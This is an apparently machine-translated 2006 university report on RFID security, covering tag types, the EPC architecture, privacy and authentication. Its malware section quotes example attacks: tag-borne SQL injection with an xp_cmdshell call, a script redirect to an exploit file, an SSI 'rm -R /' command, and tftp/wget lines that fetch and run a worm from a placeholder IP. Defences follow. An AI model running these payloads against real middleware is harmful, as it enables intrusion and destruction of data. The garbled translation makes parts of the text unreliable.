The Safety Report Aniello Coppet aka NeCoSi (necosi@autistici.org) Date: April 25, 2006 Version: 0.

2 License: GNU FDL (www.gnu.org / licenses / fdl .html # Sec1) University 'Milan - Bicocca The security of RFID 1 1 Introduction Acronym for RFID Radio Frequency Identification (translated: Radio Frequency Ide ntification). This technology was developed to automatically identify objects, a nimals or people. 1.1 RFID tag An RFID tag (also called transponders) and 'a microchip that contains a unique number + data through a universal and' integrated antenna can receive an d transmit radio frequency to a tranreceiver RFID. This electronic component loo ks like a sticker and can be great even a few millimeters. Inside is a part of " smart" is just a single circuit transmission signal (modulated radio frequency) and a nonvolatile memory containing a unique code, which is broadcast apparatus reader which will check the data received. 1.2 TAG active and passive RFID tags and RFID 125KHz 13.56Mhz are considered passive RFID. UHF RFID tags and UltraWide band (> 2.4 GHz) can be active, semi-active a nd passive. • Active tags are battery • semi-active tags are powered by batterie s only for the portion of transmission • Passive tags have no internal power sou rce, but derive the energy to be activated from the radio wave sent from the rea der that asks them 1.3 ADVANTAGES RFID, unlike bar codes and magnetic stripes: 1.4 • • • • Should not be read as being close to the magnetic stripe must not be visible to be read like bar codes can also add information about the chip depending on the type of chip (Read Only, Read Once, Read and Write) has a time for identificatio n and verification of 10/100 of a second RFID: Read Only and Read / Write, Read Only mode is used in RFID tags to simply replace the bar code. The read / write mode instead allows not only transmission but also the 'current information on the chip: the tag becomes an identificatio n system that can track the history of a product right from the stage and then b e used interactively along the chain until the retail distribution and in some c ases up to the consumer. 1.5 THE NEWS Researchers from the Vrije Universiteit, university Netherlands (Amster dam), including Melanie Rieback and Prof. Andrew Tanenbaum have found a way to i nsert a virus into RFID tags. Initially it was thought impossible because of lim ited memory tags, but at the Pervasive Computing and Communications Conference i n Pisa, 15 March 2006 these have shown that is possible. The problem could be bo

rn because of the cost of RFID tags. The companies, in fact they are trying to p roduce the first RFID tag can always cheaper to achieve competitive prices for a foothold in the market, but this race is leaving behind the fundamental aspects of computer security. The presence of even one infected tag could cause abnorma lities in an entire control system. One possible countermeasure would be to exte nd the RFID tag reading systems with a virus. The Dutch researchers have in fact created rfidguardian.org, a specialized system that observes, monitors and defe nds RFID reading systems from possible attacks. 1.6 The security of RFID 2 According to the portal rfidvirus.org said, what follows should be the photo dep icting the first RFID infected in the world: A tag infected can infect an entire control system (middleware) which can infect other RFID tags that support the R / W which, moving physically, can be accesse d from other control systems, also infect 's past, which in turn infect other ta gs and so on .... 2 2.1 Security - Malware _Start_ RFID HACKING The first question that was put was: "How can I insert an e xploit or virus in a tag that has less than 1KB of memory?" Virtually infecting RFID tags can exploit vulnerabilities in the middleware. A virus, worm or other malicious code (malware) accesses the database for example, infected, then 'data will be read from the database in turn can infect even more middleware componen ts. ATTACHMENT - 1 - SQL Injection Suppose there is a control system (middleware ) that reads RFID tags in a warehouse. The database query will look like: 2.2 "Goods: <READ RFID>" Now if we we wrote in RFID tags "table; shutdown" the syste m middleware process: "Goods: Table; shutdown" Assuming that the symbol;€indicat es the end of education and the beginning of the new, the result we would have t he security of RFID 3 like: "XYZ; Database shutdown completed" This attack is certainly not a virus, b ut it is certainly a danger because an attacker has the ability to shutdown the database at will. ATTACHMENT - 2 - buffer overflow may happen that a system for reading RFID tag is programmed to read RFID specific 128bit. The memory allocate d in the program so it could not be greater than the size specified. In this way , we could get inside of an RFID reading system so great 512bit memory middlewar e suffer a buffer overflow thus overwriting the return address on the stack so t hat when you return from the procedure, there is a jump at a specific memory of the tag, which contains malicious code. 2.3 2.4 TYPE MALWARE EXPLOIT RFID is an RFID tag capable of modifying the memory address es in the middleware and is the foundation of all malware. WORMS • RFID is based on RFID exploits, but also needs a network connection for remote replication ex ploiting flaws in other RFID systems connected. Also can 'cause a machine to dow nload and execute code remotely and thereby compromise the middleware. A middlew are system compromise, therefore, can allow the worm to replicate overwriting ot her RFID tags. • RFID Virus is a variant of RFID worms. Does not require a netwo

rk connection. Taking advantage of an exploit, virus controls the RFID middlewar e to overwrite other RFID tags. These in turn will overwrite other tags, which w ill be read by other middleware that overwrite other tags. • Middleware architecture middleware, which is at the heart of the RFID system, re ceives events from RFID readers (when a tag is read). These events are processed by different filters. The fully filtered, the event is ready to be evaluated. O ne component stores the event in a database for future jobs. RFID readers are co nnected to the middleware through the drivers (or modules). This modularity allo ws the middleware to support different devices without requiring any changes to the system! The middleware also includes a user interface, derived mainly for th e management of the system. But with time were also implemented additional inter faces that allow the management, for example in a supermarket is used an interfa ce that allows customers to track their spending. Furthermore, the middleware al lows the interconnection with other management software to extend and automate t he management of products. 2.5 VULNERABILITY 'EXTRA If middleware component makes use of a web-based user inter face (for example), there would be more vulnerable'. The RFID tags can contain i t in the section on the following code (javascript): 2.6 <script> document.location = 'http://ip/exploit.wmf'; </ script> or the code (SS I) <!--# exec cmd = "rm-R /"--> These codes, run the browser, to exploit the vul nerability 'not only the middleware, but the whole operating system (software in cluded). Note: The second code does not exploit a bug, but is simply a command t hat removes any file 'harddisk. The security of RFID 4 EXAMPLE VIRUSES When a reader reads an RFID tag, the database will be 'executed a statement similar to: 2.7 UPDATE ContainerContents September OldContents = '% contents%' WHERE TagID = '% id%' If our RFID tags contained within its memory, the following code in the dat a section Apples', NewContents = SUBSTR (GetCurrentQuery (), 43, 57)-The databas e would have to process the following statement UPDATE ContainerContents Septemb er OldContents = 'Apples', NewContents = SUBSTR (GetCurrentQuery (), 43.57)-WHER E TagId = '123' This means that the table will be updated ContainerContents and the cell will OldContents Apple. It will also be created called NewContents anot her cell that will contain 57 characters of 'education itself, after the 43rd ch aracter. Also this statement will contaminate the entire database, not only beca use the symbol instance - SQL is the start of a comment (WHERE TagId = '123 'the n will not be considered). Now, in order to allow the infection to other tags, y ou need to run additional code. Given the low memory capacity of RFID tags, we w ill try to call external programs to run middleware that can help us. Apples wit h the string '; EXEC master .. xp_cmdshell' shell commands',-SQL server to ask f or us to run a command from the shell. Below are two examples of shell commands used, the first and the second for Windows to Linux, but with small changes you can adapt to other OS is: cd \ Windows \ Temp & tftp-i <IP> GET worm.exe & worms .exe or <!--# exec cmd = "wget-O http://ip/worm / tmp / worm; chmod + x / tmp / worm, / tmp / worm" -> The first example comes in the Windows \ Temp and through the tftp protocol (does not require a login) download from <IP> worm.exe file a nd executes it. The second run wget and download the worm from IP Logged in dire ctory / tmp /, then please set the execute permissions and executes it.

2.8 • How to defend from a Database Attack: Each element must be inserted into a SQL statement only if they were used properly escapes' through the API database. Th e best solution (but more expensive) would be to never put no data directly into a 'SQL statement using only custom instructions / pre-formatted and armored par ameters so that no data can ever be tried as a code. • From Web-Based Attack: This problem is solved by using the appropriate escape 'i nside HTML. Also, if you need scripting languages (JavaScript, SSI) should be di sabled to avoid abuse. the Buffer Overflow Attack: You could use the tools capab le of managing the buffers and limits on the stack to avoid the 'data overflows (eg Valgrind, Electric Fence). Alternatively you could use an interpreted progra mming language where such control is implemented automatically and protects the stack (eg Java). • The security of RFID 5 3 Auto-ID Architecture The most important non-profit organization for the standardization of RFID techn ology has ratified its first standard and has scrutinized the ISO. The new speci fication, called Application Level Events (ALE) enables RFID applications develo ped by different manufacturers to interoperate with each other, eliminating the obstacles that today often cancel some of the advantages of RFID technology. The EPC (Eletronic Product Code) is a special RFID characterized by the simplicity of its content: nothing more than implementing a code to replace the current bar code. In reality, however, 'the EPC is not a simple extension of' UPC (Universal Product Code). What makes the EPC is the systematic approach of the innovative 'Auto-ID Center at MIT developed The EPC can be linked to the concept of "Intern et of Things" (Internet of Things). EPC will benefit greatly the ability of RFID to be read without contact (contactless), their ability to contain large amount s of data and their anti-counterfeiting features. These features combined with t he ability to find via the Internet for product information (who produced it and when it was done, where it passed, what is your due date or the date of expiry of the warranty period, etc..) Create a powerful and at the same time flexible s upply chain. The five key components of 'Auto-ID are: • • • • • 3.1 Cars, Motorcycles, Product Code (EPC) System ID (Radio Frequency Readers and Tag s) Object Name Service (ONS), Physical Markup Language (PML) Savant EPC The EPC code is divided into numbers that identify: producer, product, versi on, serial number and another set of characters to identify "unique" object. ID System ID System, or the identification system is based on RFID tags. 3.2 Object Name Service (ONS) ONS directs the computer systems on how to locate info rmation on the Internet for each object with EPC. The operation is similar to th e current DNS. The ONS takes the EPC code and returns a web address (or URL) whe re reside all information relating to that object. All this allows to store huge amounts of data in the form of information on the Internet, more than what coul d be done on individual object labels.

3.3 Physical Markup Language (PML) PML is a new standard "language" for describing p hysical objects. Based on XML (eXtensible Markup Language), together with the EP C and ONS the PML completes the set of key components necessary to link informat ion automatically to physical products. Then the EPC identifies the product, the PML describes the product, and the ONS's linking them together. The standardiza tion of these components will allow a "universal connectivity" between objects i n the physical world. 3.4 Savant Savant is a softtware to manage information in a manner that avoids overl oading of existing networks. Savant uses a distributed architecture. Savant serv ers are organized on hierarchical bases and act as the nervous system of the EPC network (EPC Network), managing the information flow. 3.5 The security of RFID 6 4 Security - Privacy Basically there are two dangerous aspects for privacy: tracking and archiving wi thout permission.€To resolve this problem have been proposed further amendments to the RFID standards, giving the user some rights on the tag in his possession: Disabling (and killing sleeping) overwriting of information (rewrite) Were then studied some techniques to help protect your privacy, but unfortunatel y it is feared that some of them could soon be illegal in some jurisdictions for "security reasons". Bloker tag is' a device in between the tag and the reader t hat implements an operation to flood the reader. Allows the blocking of tags pur chased: at the time of the tag is changed from non-locking to locking. The tag s tuck in the future "friendly advice" to the reader not to read groped. This woul d be achieved by using a bit that when set to 0, indicates that the reader is a "private tags". However, an attacker could go to a supermarket and block all pro ducts not yet sold making them be so sold. 4.1 This technique allows encryption encryption id so it can be interpreted only by a single reader. Because of the limited memory capacity of RFID, the keys are of ten cracked in no time with brute-force attacks. 4.2 Pseudonym throttling tag stores a short list of random identification codes (or aliases) known by the authorized reader. For each reading, the tag generates a n ew code. 4.3 Proxying A Watchdog Tag is an RFID tag that monitors the environment (passive se arch), reading and storing specific readers, such as the privacy policy for exam ple. 4.4 "RFID Guardian" and "RFID Enhancer Proxy" (REP), the solutions are also proposed by prof. Tanenbaum providing a sort of filter tags. These systems, Usti user ac

count of "firewall" in a position to examine and let the reader decide whether o r not to read the tag. For example, this kind of technology can prevent reading of a few tags at a distance of 30m from home (using GPS technology.) Safety dist ance of an RFID tag could release information based on the proximity of the read er. For example, if the player is away, the tag sends data very general, but app roaching at a distance "fixed" the reader, the tag could release all its informa tion. 4.5 The security of RFID 7 5 Security - Authentication A major problem not yet solved (explicitly even in the EPC Class1 - Gen2) is the ability to clone tags, or otherwise to create wireless devices capable of simul ating RFID tags. Some proposed solutions are the kill PIN and Yoking. PIN Kill O ne proposed solution, and currently being evaluated is the use of "kill PIN." In theory, each tag has a PIN that allows access to information only to readers wh o know the code. If repeated attempts, the tag could turn off. However, this met hod could be used by any attacker to disable many tags in a sepermercato example . 5.1 Yoking A second proposal was referred to as "yoking". Authentication is performe d only if two tags that are relatively close. For instance, to sell a product an d show that at the time of sale were also instructions for use. An 'extension of this method makes it possible to combine a POWF an RFID tag, ie a small plastic object containing the unique information (using tiny pieces of glass for exampl e) that are extremely difficult to reproduce. Associated with each RFID POWF all ows a greater, but also more costly authentication. The POWF however, are still of great interest for research and not for commercial use are then implemented o n a large scale. 5.2 6 Tags symmetric key This type of tag has an inside microchips capable of reproducing the functions o f symmetric encryption. These tags have a function that generates a hash code (f unction h) of a plaintext (M) and have a secret key (k). Through the function to encrypt (and function), we get the ciphertext. Using the function C = k (M) the plaintext becomes encrypted and only those who know the secret key k can go bac k to plain text M, using the ciphertext C. The management system is centralized readers, the middleware has secret codes that the counterparts of each of its ta gs and each tag has a random secret code previously stored in the system. We wil l therefore, where is the number of tags and Ki which is the secret code of the tag i. Cloning and Authentication In this type of tag, the problem of cloning is apparently resolved.€Indeed authentication between the tag and the reader is us ing a secret key passed through a hash code. Each authentication because: 1. The tag sends its ID to the reader (you) 2. The tag reader sends a random string R 3. The tag will generate a hash code using the function H = h (Ki, R) and send i t to the reader 4. The reader will verify H = (Ki, R) occur in this way if the s ecret key Ki stored matches the one just used by the tag encoding 6.1

In theory the only way to break this security system would be to make physical a ttacks by removing the tag directly from the microchip code. The security of RFID 8 A practical implementation of DST tags symmetric key now is represented by the D igital Signature Transponder (DST). Because of the small storage capacity of the tag, the DST system, which devotes only 40bits the secret key, it proved weak a gainst brute-force attacks. 6.2 3.6 Methods of detection of secret keys Reverse-engineering and side channels: ○ T his type of interception is based on measurement of energy-magnetic due to the c alculations for the functions of encryption. The two predominant forms of analys is of side channel attacks are the synchronization, which extract information ba sed on changes in the rate of computing devices and attacks on 'analysis of' pow er, exploiting the measurable changes in power supply. Relay attacks: ○ This attack, also known as man-in-the-middle, in RFID can be a real threat. In fact, this technique can, in addition to "listen" communication, even around the limitations of the "safe distance". Interposing of radio repeat ers and one can connect to tags and readers also several miles distant. Some cou ntermeasures are the use of PINs, physical buttons can be activated manually, an d GPS support for physical identification. Privacy The use of secret keys is a unique problem for privacy. Being extremely simple to go back to the secret key, if it were statically linked to an identifi cation code would be simple to trace and identify the tag at all times. To anony mize the tag would require that the secret key was updated after a period t with a random key k random so that the tracking and identification would become "imp ossible." 6.4 7 References [RFID English Wikipedia] (http://en.wikipedia.org/wiki/RFID) [Italian Wikipedia RFID] (http://it.wikipedia.org/wiki/RFID) [RFID Viruses and Worms] Melanie R. Ri eback, Patrick N. D. Simpson, Bruno Crispo, Andrew S. Tanenbaum - Vrije Universi teit Amsterdam Department of Computer Science (http://www.rfidvirus.org) [RFID S ecurity and Privacy: A Research Survey] Ari Juels of RSA Laboratories (ajuels@rs asecurity.com) The security of RFID 9 8 Index Table of Contents The security of RFID .............................................. ............ ...................................... ......................................... ........ 1 1 Introduction ................................................ ..... ............................................. ..................................

................ RFID .................................. ............. 2 1.1 ... ............................................... ................................ .................. .............................. .............................. ................ 2 1.2 RFID TAG ................................................ .. .................................................. ......... 2 1.3 active and passive RFID TAG ........................................... .................. ................................ BENEFITS ...................................... 2 1.4 ......... .................................................. ............ ...................................... ......................................... .. 2 1.5 RFID: Read Only and Read / Write ...................................... .. .................................................. .......................... ....... 2 1.6 THE NEWS ............. ........................................... ....... .................................................. ..................... ...................... 2 2 Security - Malware .. ............................... ................... .................................................. ......... ..................................... 3 2.1 _Start_ RFID HACKING ............... .............................. ................................................. . ..................................... ATTACHMENT 3 2.2 - 1 - SQL Injection ... ....................................... ........................................ .......... ....................... ATTACHMENT 3 2.3 - 2 - BUFFER OVERFLOW ...... ........................................................... .................... ..................... MALWARE TYPE ............................................. . 4 2.4 .................................................. ..................... ............. MIDDLEWARE ARCHITECTURE .......................................... .... 4 2.5 .................................................. ................. 4 2.6 VULNERABILITY 'EXTRA ............................................. ....... ........................................... ............................... EXAM PLE VIRUSES .............................................. 4 2.7 ............... ................................... ............................................ ... 5 2.8 How to defend .............................................. ......... ......................................... ...................................... ... 5 3 The Auto-ID architecture .......................................... .... .............................................. ................................. ................. ... EPC ............................................... 6 3.1 .................................................. ............................. ..................... ................... 6 3.2 ID System ...................... ........................ .................................................. .... .............................................. .......... 6 3.3 Object Name Serv ice (ONS ).......................................... ........................... ....................... ................................... 6 3.4 Physical Marku p Language (PML ).......................................... .................... .............................. ......................... Savant ................ ............................... 6 3.5 .......................................... ........ .................................................. ............... 6 4 Security - Privacy ............................................. ............... ................................... ............................................ ...... ..... 7 4.1 Bloker tags .............................................. .. ................................................ ............................... ................... .......... ..................................... 7 4.2 Encry ption .................................................. ....................... ........................... .................. ............................ 7 4. 3 Pseudonym throttling .................................................. ...... ............................................ ........... 7 4.4 Proxying ........ ............................ .................................................. .................................................. ....................... 7 4.5 Safety distance ...................... ........................................ .......... .................................................. ................. 7 5 Security - Authentication ............................................. .... .............................................. PIN ............................. .............. 8 5.1 Kill ... ..................................................

.................................................. ............................ ...................... ....... ........................................ 8 5.2 Yo king .................................................. ........................ .......................... ..................... 8 6 Tags symmetric key ........ .................................... ........................................... ....... .............................................. 8 6.1 Authentication and Cloning ............................................. .......................... ........................ ................................ DST .................. ............................. 8 6.2 ............................................ ...... .................................................. ................... 9 6.3 Methods of interception of secret keys ....................... ............. ..................................... ............................ Privacy ..... .......................................... 9 6.4 ............................... ................... .................................................. ......... ..... 9 7 References ............................................... ........... ....................................... ........................................ .......... ................ ............................... 9 8 index .......... ........................................ ....................................... ........... ...................................... 10 The security of RFID 10